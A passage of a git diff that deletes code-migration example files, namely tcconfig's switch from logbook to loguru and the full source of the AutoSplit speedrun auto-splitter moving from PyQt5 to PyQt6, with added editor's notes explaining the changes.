LookupError: If ``log_level`` is an invalid value. 
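# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# The hunk above is a logbook -> loguru migration: per-logger-object state is
# replaced by namespace toggles plus handler (re)registration. The essentials,
# reduced to a standalone file:
import sys

from loguru import logger

MODULE_NAME = "tcconfig"
logger.disable(MODULE_NAME)  # library stays silent until a caller opts in

def set_logger(is_enable: bool) -> None:
    # enable()/disable() act on records emitted from the named package
    (logger.enable if is_enable else logger.disable)(MODULE_NAME)

def set_log_level(log_level: str) -> None:
    logger.remove()  # drop previously registered sinks, then re-add stderr
    logger.add(sys.stderr, colorize=True, format="[{level}] {message}", level=log_level)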
-- """ -+ if log_level == "DEBUG": -+ log_format = ( -+ "{level: <8} | " -+ "{name}:{function}:{line} - {message}" -+ ) -+ else: -+ log_format = "[{level}] {message}" - -- # validate log level -- logbook.get_level_name(log_level) -+ logger.remove() -+ logger.add(sys.stderr, colorize=True, format=log_format, level=log_level) - -- if log_level == logger.level: -- return -- -- if log_level == logbook.NOTSET: -+ if log_level == "QUIET": - set_logger(is_enable=False) - else: - set_logger(is_enable=True) -- -- logger.level = log_level -- simplesqlite.set_log_level(log_level) -- subprocrunner.set_log_level(log_level) diff --git a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py b/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py deleted file mode 100644 index c43e62f..0000000 --- a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py +++ /dev/null @@ -1,64 +0,0 @@ -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - - -import logbook -import simplesqlite -import subprocrunner - - -def _disable_logger(l): - try: - l.disable() - except AttributeError: - l.disabled = True # to support Logbook<1.0.0 - - -logger = logbook.Logger("tcconfig") -_disable_logger(logger) - - -def set_logger(is_enable): - if is_enable != logger.disabled: - # logger setting have not changed - return - - if is_enable: - try: - logger.enable() - except AttributeError: - logger.disabled = False # to support Logbook<1.0.0 - else: - _disable_logger(logger) - - simplesqlite.set_logger(is_enable) - subprocrunner.set_logger(is_enable) - - -def set_log_level(log_level): - """ - Set logging level of this module. The module using - `logbook `__ module for logging. - - :param int log_level: - One of the log level of the - `logbook `__. - Disabled logging if the ``log_level`` is ``logbook.NOTSET``. - :raises LookupError: If ``log_level`` is an invalid value. - """ - - # validate log level - logbook.get_level_name(log_level) - - if log_level == logger.level: - return - - if log_level == logbook.NOTSET: - set_logger(is_enable=False) - else: - set_logger(is_enable=True) - - logger.level = log_level - simplesqlite.set_log_level(log_level) - subprocrunner.set_log_level(log_level) diff --git a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py b/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py deleted file mode 100644 index f66f521..0000000 --- a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py +++ /dev/null @@ -1,46 +0,0 @@ -""" -.. 
codeauthor:: Tsuyoshi Hombashi -""" - - -import sys - -import simplesqlite -import subprocrunner -from loguru import logger - - -MODULE_NAME = "tcconfig" - -logger.disable(MODULE_NAME) - - -def set_logger(is_enable, propagation_depth=3): - if is_enable: - logger.enable(MODULE_NAME) - else: - logger.disable(MODULE_NAME) - - if propagation_depth <= 0: - return - - simplesqlite.set_logger(is_enable) - subprocrunner.set_logger(is_enable) - - -def set_log_level(log_level): - if log_level == "DEBUG": - log_format = ( - "{level: <8} | " - "{name}:{function}:{line} - {message}" - ) - else: - log_format = "[{level}] {message}" - - logger.remove() - logger.add(sys.stderr, colorize=True, format=log_format, level=log_level) - - if log_level == "QUIET": - set_logger(is_enable=False) - else: - set_logger(is_enable=True) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff deleted file mode 100644 index 71a60b5..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff +++ /dev/null @@ -1,149 +0,0 @@ -diff --git a/src/AutoSplit.py b/src/AutoSplit.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/AutoSplit.py - +++ b/src/AutoSplit.py -@@ -1,7 +1,7 @@ --#!/usr/bin/python3.7 -+#!/usr/bin/python3.9 - # -*- coding: utf-8 -*- - --from PyQt5 import QtCore, QtGui, QtTest, QtWidgets -+from PyQt6 import QtCore, QtGui, QtTest, QtWidgets - from win32 import win32gui - import sys - import os -@@ -19,11 +19,13 @@ import split_parser - - - class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): -- from hotkeys import beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, setPauseHotkey -- from error_messages import (splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, -- splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, alignmentNotMatchedError, -- multipleResetImagesError, noResetImageThresholdError, resetHotkeyError, pauseHotkeyError, dummySplitsError, settingsNotFoundError, -- invalidSettingsError, oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError) -+ from hotkeys import ( -+ beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, -+ setPauseHotkey) -+ from error_messages import ( -+ splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, -+ splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, -+ oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError, invalidSettingsError) - from settings_file import saveSettings, saveSettingsAs, loadSettings, haveSettingsChanged, getSaveSettingsValues - from screen_region import selectRegion, selectWindow, alignRegion - from menu_bar import about, viewHelp -@@ -136,7 +138,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - - def checkLiveImage(self): - if self.liveimageCheckBox.isChecked(): -- self.timerLiveImage.start(1000 / 60) -+ self.timerLiveImage.start(int(1000 / 60)) - else: - self.timerLiveImage.stop() - self.liveImageFunction() -@@ -161,7 +163,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - - # Convert to set it on the label - qImg = QtGui.QImage(capture, 
capture.shape[1], capture.shape[0], capture.shape[1] * 3, -- QtGui.QImage.Format_RGB888) -+ QtGui.QImage.Format.Format_RGB888) - pix = QtGui.QPixmap(qImg) - self.liveImage.setPixmap(pix) - -@@ -614,7 +616,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.currentsplitimagefileLabel.setText(' ') -- self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - - # check for reset while delayed and display a counter of the remaining split delay time - delay_start_time = time.time() -@@ -677,7 +679,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - if self.number_of_split_images != self.split_image_number: - # set current split image to none - self.currentsplitimagefileLabel.setText(' ') -- self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.imageloopLabel.setText('Image Loop #: -') - - # if its the last split image and last loop number, disable the skip split button -@@ -878,7 +880,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - - qImg = QtGui.QImage(self.split_image_display, self.split_image_display.shape[1], - self.split_image_display.shape[0], self.split_image_display.shape[1] * 3, -- QtGui.QImage.Format_RGB888) -+ QtGui.QImage.Format.Format_RGB888) - self.updateCurrentSplitImage.emit(qImg) - self.currentsplitimagefileLabel.setText(split_image_file) - -@@ -924,48 +926,39 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - # exit safely when closing the window - def closeEvent(self, event): - if self.haveSettingsChanged(): -- #give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. -- if self.last_successfully_loaded_settings_file_path == None: -- msgBox = QtWidgets.QMessageBox -- warning = msgBox.warning(self, "AutoSplit","Do you want to save changes made to settings file Untitled?", msgBox.Yes | msgBox.No | msgBox.Cancel) -- if warning == msgBox.Yes: -- self.saveSettingsAs() -- sys.exit() -- event.accept() -- if warning == msgBox.No: -- event.accept() -- sys.exit() -- pass -- if warning == msgBox.Cancel: -- event.ignore() -- return -- else: -- msgBox = QtWidgets.QMessageBox -- warning = msgBox.warning(self, "AutoSplit", "Do you want to save the changes made to the settings file " + os.path.basename(self.last_successfully_loaded_settings_file_path) + " ?", msgBox.Yes | msgBox.No | msgBox.Cancel) -- if warning == msgBox.Yes: -- self.saveSettings() -- sys.exit() -- event.accept() -- if warning == msgBox.No: -- event.accept() -- sys.exit() -- pass -- if warning == msgBox.Cancel: -- event.ignore() -- return -+ # give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. -+ msgBox = QtWidgets.QMessageBox -+ settings_file_name = "Untitled" \ -+ if self.last_successfully_loaded_settings_file_path is None \ -+ else os.path.basename(self.last_successfully_loaded_settings_file_path) -+ warning_message = f"Do you want to save changes made to settings file {settings_file_name}?" 
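# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# The hunks above are the mechanical PyQt5 -> PyQt6 changes: PyQt6 only
# exposes fully scoped enums, so every bare member gains its enum-class name,
# and QApplication.exec_() becomes exec(). Side by side, assuming PyQt6 is
# installed:
from PyQt6 import QtCore, QtGui, QtWidgets

alignment = QtCore.Qt.AlignmentFlag.AlignCenter       # PyQt5: QtCore.Qt.AlignCenter
image_fmt = QtGui.QImage.Format.Format_RGB888         # PyQt5: QtGui.QImage.Format_RGB888
buttons = (QtWidgets.QMessageBox.StandardButton.Yes   # PyQt5: msgBox.Yes | msgBox.No
           | QtWidgets.QMessageBox.StandardButton.No)
# and in main(): sys.exit(app.exec())                 # PyQt5: sys.exit(app.exec_())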
-+ -+ warning = msgBox.warning( -+ self, -+ "AutoSplit", -+ warning_message, -+ msgBox.StandardButton.Yes | msgBox.StandardButton.No | msgBox.StandardButton.Cancel) -+ -+ if warning == msgBox.StandardButton.Yes: -+ # TODO: Don't close if user cancelled the save -+ self.saveSettingsAs() -+ exit() -+ if warning == msgBox.StandardButton.No: -+ exit() -+ if warning == msgBox.StandardButton.Cancel: -+ event.ignore() - else: - event.accept() - sys.exit() - - -- - def main(): - app = QtWidgets.QApplication(sys.argv) - app.setWindowIcon(QtGui.QIcon('icon.ico')) - w = AutoSplit() - w.setWindowIcon(QtGui.QIcon('icon.ico')) - w.show() -- sys.exit(app.exec_()) -+ sys.exit(app.exec()) - - - if __name__ == '__main__': diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py deleted file mode 100644 index 6de181e..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py +++ /dev/null @@ -1,972 +0,0 @@ -#!/usr/bin/python3.7 -# -*- coding: utf-8 -*- - -from PyQt5 import QtCore, QtGui, QtTest, QtWidgets -from win32 import win32gui -import sys -import os -import cv2 -import time -import ctypes.wintypes -import ctypes -import keyboard -import numpy as np - -import design -import compare -import capture_windows -import split_parser - - -class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - from hotkeys import beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, setPauseHotkey - from error_messages import (splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, - splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, alignmentNotMatchedError, - multipleResetImagesError, noResetImageThresholdError, resetHotkeyError, pauseHotkeyError, dummySplitsError, settingsNotFoundError, - invalidSettingsError, oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError) - from settings_file import saveSettings, saveSettingsAs, loadSettings, haveSettingsChanged, getSaveSettingsValues - from screen_region import selectRegion, selectWindow, alignRegion - from menu_bar import about, viewHelp - - myappid = u'mycompany.myproduct.subproduct.version' - ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) - - # signals - updateCurrentSplitImage = QtCore.pyqtSignal(QtGui.QImage) - startAutoSplitterSignal = QtCore.pyqtSignal() - resetSignal = QtCore.pyqtSignal() - skipSplitSignal = QtCore.pyqtSignal() - undoSplitSignal = QtCore.pyqtSignal() - pauseSignal = QtCore.pyqtSignal() - afterSettingHotkeySignal = QtCore.pyqtSignal() - - def __init__(self, parent=None): - super(AutoSplit, self).__init__(parent) - self.setupUi(self) - - # close all processes when closing window - self.actionView_Help.triggered.connect(self.viewHelp) - self.actionAbout.triggered.connect(self.about) - self.actionSave_Settings.triggered.connect(self.saveSettings) - self.actionSave_Settings_As.triggered.connect(self.saveSettingsAs) - self.actionLoad_Settings.triggered.connect(self.loadSettings) - - # disable buttons upon open - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.resetButton.setEnabled(False) - - # resize to these width and height so that FPS performance increases - self.RESIZE_WIDTH = 320 - self.RESIZE_HEIGHT = 240 - - # split image folder line edit text - 
self.splitimagefolderLineEdit.setText('No Folder Selected') - - # Connecting button clicks to functions - self.browseButton.clicked.connect(self.browse) - self.selectregionButton.clicked.connect(self.selectRegion) - self.takescreenshotButton.clicked.connect(self.takeScreenshot) - self.startautosplitterButton.clicked.connect(self.autoSplitter) - self.checkfpsButton.clicked.connect(self.checkFPS) - self.resetButton.clicked.connect(self.reset) - self.skipsplitButton.clicked.connect(self.skipSplit) - self.undosplitButton.clicked.connect(self.undoSplit) - self.setsplithotkeyButton.clicked.connect(self.setSplitHotkey) - self.setresethotkeyButton.clicked.connect(self.setResetHotkey) - self.setskipsplithotkeyButton.clicked.connect(self.setSkipSplitHotkey) - self.setundosplithotkeyButton.clicked.connect(self.setUndoSplitHotkey) - self.setpausehotkeyButton.clicked.connect(self.setPauseHotkey) - self.alignregionButton.clicked.connect(self.alignRegion) - self.selectwindowButton.clicked.connect(self.selectWindow) - - # update x, y, width, and height when changing the value of these spinbox's are changed - self.xSpinBox.valueChanged.connect(self.updateX) - self.ySpinBox.valueChanged.connect(self.updateY) - self.widthSpinBox.valueChanged.connect(self.updateWidth) - self.heightSpinBox.valueChanged.connect(self.updateHeight) - - # connect signals to functions - self.updateCurrentSplitImage.connect(self.updateSplitImageGUI) - self.afterSettingHotkeySignal.connect(self.afterSettingHotkey) - self.startAutoSplitterSignal.connect(self.autoSplitter) - self.resetSignal.connect(self.reset) - self.skipSplitSignal.connect(self.skipSplit) - self.undoSplitSignal.connect(self.undoSplit) - #self.pauseSignal.connect(self.pause) - - # live image checkbox - self.liveimageCheckBox.clicked.connect(self.checkLiveImage) - self.timerLiveImage = QtCore.QTimer() - self.timerLiveImage.timeout.connect(self.liveImageFunction) - - # Default Settings for the region capture - self.hwnd = 0 - self.hwnd_title = '' - self.rect = ctypes.wintypes.RECT() - - #last loaded settings and last successful loaded settings file path to None until we try to load them - self.last_loaded_settings = None - self.last_successfully_loaded_settings_file_path = None - - # find all .pkls in AutoSplit folder, error if there is none or more than 1 - self.load_settings_on_open = True - self.loadSettings() - self.load_settings_on_open = False - - # initialize a few settings options - self.last_saved_settings = None - - self.live_image_function_on_open = True - - # FUNCTIONS - #TODO add checkbox for going back to image 1 when resetting. - def browse(self): - # User selects the file with the split images in it. - self.split_image_directory = str( - QtWidgets.QFileDialog.getExistingDirectory(self, "Select Split Image Directory")) + '\\' - - # If the user doesn't select a folder, it defaults to \. 
Set it back to whats in the LineEdit, and return - if self.split_image_directory == '\\': - self.split_image_directory = self.splitimagefolderLineEdit.text() - return - - # set the split image folder line to the directory text - self.splitimagefolderLineEdit.setText(self.split_image_directory) - - def checkLiveImage(self): - if self.liveimageCheckBox.isChecked(): - self.timerLiveImage.start(1000 / 60) - else: - self.timerLiveImage.stop() - self.liveImageFunction() - - def liveImageFunction(self): - try: - if win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == True: - self.timerLiveImage.stop() - self.live_image_function_on_open = False - return - - elif win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == False: - self.regionError() - self.timerLiveImage.stop() - return - - ctypes.windll.user32.SetProcessDPIAware() - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (240, 180)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - # Convert to set it on the label - qImg = QtGui.QImage(capture, capture.shape[1], capture.shape[0], capture.shape[1] * 3, - QtGui.QImage.Format_RGB888) - pix = QtGui.QPixmap(qImg) - self.liveImage.setPixmap(pix) - - except AttributeError: - pass - - # update x, y, width, height when spinbox values are changed - def updateX(self): - try: - self.rect.left = self.xSpinBox.value() - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateY(self): - try: - self.rect.top = self.ySpinBox.value() - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateWidth(self): - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - - def updateHeight(self): - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - - # update current split image. needed this to avoid updating it through the hotkey thread. - def updateSplitImageGUI(self, qImg): - pix = QtGui.QPixmap(qImg) - self.currentSplitImage.setPixmap(pix) - - def takeScreenshot(self): - # error checks - if self.splitimagefolderLineEdit.text() == 'No Folder Selected': - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - take_screenshot_filename = '001_SplitImage' - - # check if file exists and rename it if it does - # Below starts the FileNameNumber at #001 up to #999. After that it will go to 1000, - # which is a problem, but I doubt anyone will get to 1000 split images... - i = 1 - while os.path.exists(self.split_image_directory + take_screenshot_filename + '.png') == True: - FileNameNumber = (f"{i:03}") - take_screenshot_filename = FileNameNumber + '_SplitImage' - i = i + 1 - - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - # save and open image - cv2.imwrite(self.split_image_directory + take_screenshot_filename + '.png', capture) - os.startfile(self.split_image_directory + take_screenshot_filename + '.png') - - # check max FPS button connects here. 
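# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# takeScreenshot() above probes the split-image directory for the first free
# NNN_SplitImage.png name, counting up from 001 (with no cap at 999, as its
# own comment warns). The numbering loop on its own:
import os

def next_screenshot_name(directory: str) -> str:
    name = "001_SplitImage"
    i = 1
    while os.path.exists(os.path.join(directory, name + ".png")):
        name = f"{i:03}_SplitImage"
        i += 1
    return name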
- def checkFPS(self): - # error checking - split_image_directory = self.splitimagefolderLineEdit.text() - if split_image_directory == 'No Folder Selected' or split_image_directory is None: - self.splitImageDirectoryError() - return - - split_image_filenames = os.listdir(split_image_directory) - for image in split_image_filenames: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - self.imageTypeError(image) - return - else: - pass - - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - - if self.width == 0 or self.height == 0: - self.regionSizeError() - return - - # grab first image in the split image folder - split_image_file = split_image_filenames[0] - split_image_path = split_image_directory + split_image_file - split_image = cv2.imread(split_image_path, cv2.IMREAD_COLOR) - split_image = cv2.cvtColor(split_image, cv2.COLOR_BGR2RGB) - split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # run 10 iterations of screenshotting capture region + comparison. - count = 0 - t0 = time.time() - while count < 10: - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - if self.comparisonmethodComboBox.currentIndex() == 0: - similarity = compare.compare_l2_norm(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - similarity = compare.compare_histograms(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - similarity = compare.compare_phash(split_image, capture) - - count = count + 1 - - # calculate FPS - t1 = time.time() - FPS = int(10 / (t1 - t0)) - FPS = str(FPS) - self.fpsvalueLabel.setText(FPS) - - # undo split button and hotkey connect to here - def undoSplit(self): - if self.undosplitButton.isEnabled() == False: - return - - if self.loop_number != 1 and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number - 1 - - elif self.groupDummySplitsCheckBox.isChecked() == True: - for i, group in enumerate(self.split_groups): - if i > 0 and self.split_image_number in group: - self.split_image_number = self.split_groups[i - 1][0] - break - - else: - self.split_image_number = self.split_image_number - 1 - self.loop_number = self.split_image_loop_amount[self.split_image_number] - - self.updateSplitImage() - - return - - # skip split button and hotkey connect to here - def skipSplit(self): - - if self.skipsplitButton.isEnabled() == False: - return - - if self.loop_number < self.split_image_loop_amount[self.split_image_number] and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number + 1 - elif self.groupDummySplitsCheckBox.isChecked() == True: - for group in self.split_groups: - if self.split_image_number in group: - self.split_image_number = group[-1] + 1 - break - else: - self.split_image_number = self.split_image_number + 1 - self.loop_number = 1 - - self.updateSplitImage() - - return - - #def pause(self): - #TODO add what to do when you hit pause hotkey, if this even needs to be done - - def reset(self): - # when the reset button or hotkey is pressed, it will change this text, which will trigger in the autoSplitter function, if running, to abort and change GUI. 
- self.startautosplitterButton.setText('Start Auto Splitter') - return - - # functions for the hotkeys to return to the main thread from signals and start their corresponding functions - def startAutoSplitter(self): - # if the auto splitter is already running or the button is disabled, don't emit the signal to start it. - if self.startautosplitterButton.text() == 'Running..' or self.startautosplitterButton.isEnabled() == False: - return - else: - self.startAutoSplitterSignal.emit() - - def startReset(self): - self.resetSignal.emit() - - def startSkipSplit(self): - self.skipSplitSignal.emit() - - def startUndoSplit(self): - self.undoSplitSignal.emit() - - def startPause(self): - self.pauseSignal.emit() - - def autoSplitter(self): - # error checking: - if str(self.splitimagefolderLineEdit.text()) == 'No Folder Selected': - self.guiChangesOnReset() - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.guiChangesOnReset() - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.guiChangesOnReset() - self.regionError() - return - - # get split image filenames - self.split_image_filenames = os.listdir(self.split_image_directory) - - # Make sure that each of the images follows the guidelines for correct format - # according to all of the settings selected by the user. - for image in self.split_image_filenames: - - # Check to make sure the file is actually an image format that can be opened - # according to the mask flag - if split_parser.flags_from_filename(image) & 0x02 == 0x02: - source = cv2.imread(self.split_image_directory + image, cv2.IMREAD_UNCHANGED) - - if source is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - if source.shape[2] != 4: - # Error, this file doesn't have an alpha channel even - # though the flag for masking was added - self.guiChangesOnReset() - self.alphaChannelError(image) - return - - else: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - #error out if there is a {p} flag but no pause hotkey set. 
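# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# The checks through this section read single bits out of
# split_parser.flags_from_filename(); the meanings below are inferred from how
# each mask is used in this file, not from a spec:
DUMMY_FLAG = 0x01  # dummy split: threshold met but no hotkey is sent
MASK_FLAG = 0x02   # image carries an alpha channel used as a comparison mask
BELOW_FLAG = 0x04  # the "b" flag: split when similarity drops back below threshold
PAUSE_FLAG = 0x08  # the {p} flag: send the pause hotkey instead of the split hotkey

def has_flag(flags: int, flag: int) -> bool:
    return flags & flag == flag  # same idiom as `flags & 0x02 == 0x02` above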
- if self.pausehotkeyLineEdit.text() == '' and split_parser.flags_from_filename(image) & 0x08 == 0x08: - self.guiChangesOnReset() - self.pauseHotkeyError() - return - - if self.custompausetimesCheckBox.isChecked() and split_parser.pause_from_filename(image) is None: - # Error, this file doesn't have a pause, but the checkbox was - # selected for unique pause times - self.guiChangesOnReset() - self.customPauseError(image) - return - - if self.customthresholdsCheckBox.isChecked() and split_parser.threshold_from_filename(image) is None: - # Error, this file doesn't have a threshold, but the checkbox - # was selected for unique thresholds - self.guiChangesOnReset() - self.customThresholdError(image) - return - - if self.splitLineEdit.text() == '': - self.guiChangesOnReset() - self.splitHotkeyError() - return - - # find reset image then remove it from the list - self.findResetImage() - - # Check that there's only one reset image - for image in self.split_image_filenames: - - if split_parser.is_reset_image(image): - self.guiChangesOnReset() - self.multipleResetImagesError() - return - - # if there is no custom threshold for the reset image, throw an error. - if self.reset_image is not None and self.reset_image_threshold is None: - self.guiChangesOnReset() - self.noResetImageThresholdError() - return - - # If there is no reset hotkey set but a reset image is present, throw an error. - if self.resetLineEdit.text() == '' and self.reset_image is not None: - self.guiChangesOnReset() - self.resetHotkeyError() - return - - # construct groups of splits if needed - self.split_groups = [] - if self.groupDummySplitsCheckBox.isChecked(): - current_group = [] - self.split_groups.append(current_group) - - for i, image in enumerate(self.split_image_filenames): - current_group.append(i) - - flags = split_parser.flags_from_filename(image) - if flags & 0x01 != 0x01 and i < len(self.split_image_filenames) - 1: - current_group = [] - self.split_groups.append(current_group) - - # construct dummy splits array - self.dummy_splits_array = [] - for i, image in enumerate(self.split_image_filenames): - if split_parser.flags_from_filename(image) & 0x01 == 0x01: - self.dummy_splits_array.append(True) - else: - self.dummy_splits_array.append(False) - - # construct loop amounts for each split image - self.split_image_loop_amount = [] - for i, image in enumerate(self.split_image_filenames): - self.split_image_loop_amount.append(split_parser.loop_from_filename(image)) - - if any(x > 1 for x in self.split_image_loop_amount) and self.groupDummySplitsCheckBox.isChecked() == True: - self.dummySplitsError() - return - - self.guiChangesOnStart() - - # initialize some settings - self.split_image_number = 0 - self.loop_number = 1 - self.number_of_split_images = len(self.split_image_filenames) - self.waiting_for_split_delay = False - self.split_below_threshold = False - - self.run_start_time = time.time() - - # First while loop: stays in this loop until all of the split images have been split - while self.split_image_number < self.number_of_split_images: - - # Check if we are not waiting for the split delay to send the key press - if self.waiting_for_split_delay == True: - time_millis = int(round(time.time() * 1000)) - if time_millis < self.split_time: - QtWidgets.QApplication.processEvents() - continue - - self.updateSplitImage() - - # second while loop: stays in this loop until similarity threshold is met - # skip loop if we just finished waiting for the split delay and need to press the split key! 
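# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# The split_groups construction above gathers each run of consecutive dummy
# splits together with the real split that ends the run. Distilled into a
# pure function:
def group_dummy_splits(is_dummy: list) -> list:
    groups, current = [], []
    for i, dummy in enumerate(is_dummy):
        current.append(i)
        if not dummy:
            groups.append(current)
            current = []
    if current:  # trailing dummies with no closing real split
        groups.append(current)
    return groups

assert group_dummy_splits([True, True, False, False]) == [[0, 1, 2], [3]]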
- start = time.time() - while True: - # reset if the set screen region window was closed - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - reset_masked = None - capture = None - - if self.shouldCheckResetImage(): - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # get capture again if needed - masked = (self.flags & 0x02 == 0x02) - if capture is None or masked != reset_masked: - capture = self.getCaptureForComparison(masked) - - # calculate similarity for split image - self.similarity = self.compareImage(self.split_image, self.mask, capture) - - # show live similarity if the checkbox is checked - if self.showlivesimilarityCheckBox.isChecked(): - self.livesimilarityLabel.setText(str(self.similarity)[:4]) - else: - self.livesimilarityLabel.setText(' ') - - # if the similarity becomes higher than highest similarity, set it as such. - if self.similarity > self.highest_similarity: - self.highest_similarity = self.similarity - - # show live highest similarity if the checkbox is checked - if self.showhighestsimilarityCheckBox.isChecked(): - self.highestsimilarityLabel.setText(str(self.highest_similarity)[:4]) - else: - self.highestsimilarityLabel.setText(' ') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - # if the b flag is set, let similarity go above threshold first, then split on similarity below threshold. - # if no b flag, just split when similarity goes above threshold. 
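# ---- editor's note: illustrative sketch, not part of the recorded patch ----
# The comment above describes hysteresis: with the b flag set, similarity must
# first rise past the threshold, and the split fires once it drops back below.
# The same state machine in isolation:
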